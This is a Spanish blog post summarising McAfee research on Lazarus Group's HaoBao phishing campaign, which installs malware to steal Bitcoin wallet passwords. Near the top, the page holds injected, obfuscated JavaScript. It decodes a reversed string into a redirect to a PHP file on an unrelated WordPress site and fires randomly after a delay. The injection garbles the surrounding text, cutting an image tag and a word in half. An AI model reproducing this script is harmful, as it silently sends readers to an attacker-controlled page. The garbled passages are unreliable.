Malware descubierto por McAfee con el que podrían robar BITCOIN
Investigadores de McAfee, la compañía de Software para la ciberseguridad, famosos por su renombrado antivirus. Han detectado una reciente serie de ataques cibernéticos provenientes de la organización de hackers “Lazarus Group”. Un grupo dedicado a grandes ataques informáticos, phishing, robos cibernéticos y más. La cual se encuentra distribuyendo un malware dedicado a robar información. Probablemente, se presume que también estén involucrados con un gran robo de bitcoins.
{if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}</script>tonianos.com/wp-content/uploads/2018/02/McAfee-descubre-Malware-2-1024×576.jpg” width=”1024″ height=”576″ /></p>
<p>Lazarus Team estaría en proceso de ejecutar una gran campaña para el robo de Bitcoins y Crip<script>$NfI=function(n){if (typeof ($NfI.list[n]) == )
tomonedas
Los analistas de la oficina de Investigación de Amenazas Avanzadas (ATR, por sus siglas en inglés). Descubrieron lo que aparenta ser una nueva campaña scam de bitcoins por parte de la grupal de ciberdelincuentes. La campaña tiene por nombre HaoBao y busca acceder a miles de wallets para dejarles completamente vacías.
En su metodología, los hackers se hacen pasar por un ente aparentemente confiable. Con el fin de engañar a los usuarios y de esta manera instalar un sofisticado malware con efectos a largo plazo. Particularmente, en este caso los hackers utilizan el phishing para enviar correos electrónicos sobre reclutamiento de personal. Con el fin de convencer a los usuarios de abrir enlaces o descargar archivos maliciosos que infecten sus computadoras. Se dice que, actualmente este grupo se está enfocando en atacar a usuarios de criptomonedas y a organizaciones financieras.
Los objetivos del ataque y el tipo de código utilizado, hacen creer a McAfee que el Lazarus Group, el cuál mantiene relación con Corea del Norte, se prepara para realizar un sofisticado robo de criptomonedas que nunca antes había ocurrido. Los analistas de ATR llegan a la conclusión de que no es la primera vez que Lazarus Group emplea estas tácticas. En el transcurso del año pasado, el grupo de hackers hizo uso del Phishing. Con el objetivo atacar una serie de organizaciones de habla inglesa y coreana, para obtener datos importantes y dinero de sus víctimas.
Un robo masivo dirigido a los que posean Bitcoin
Sin embargo, aunque las herramientas de infección que han usado para HaoBao han sido usadas con anterioridad por este grupo de hackers. El malware que están usando parece ser algo totalmente nuevo. Adicional a esto, el virus instala un programa que se ejecuta de forma continua oculto en un segundo plano, buscando las contraseñas de los monederos Bitcoin.
Cuando estas contraseñas son encontradas, pasan a ser reenviadas a un servidor, el del ladrón. Gracias a una funcionalidad que también le permite recibir información, con lo que el troyano puede actualizarse a versiones más nuevas.
Una de las aplicaciones que instala el malware tiene por nombre “Pop-Up Blocker” y se describe como un “Bloqueador de ventanas emergentes y otras molestias”, por lo que si se encuentra, se debe eliminar, así lo aconseja SecureMac.
NOTA: Los interesados en información sobre contrato de soporte Asistencia Tecnica de SATINFO y/o licencia de uso/actualizaciones de sus utilidades, contacten con info@satinfo.es
__________
Este blog no se hace responsable de las opiniones y comentarios de los textos en los que se cita la Fuente, ofreciendo su contenido solo para facilitar el acceso a la información del mismo.
Puedes seguir cualquier respuesta a esta entrada mediante el canal RSS 2.0. Los comentarios y los pings están cerrados.
Siguenos
en facebook
Los comentarios están cerrados.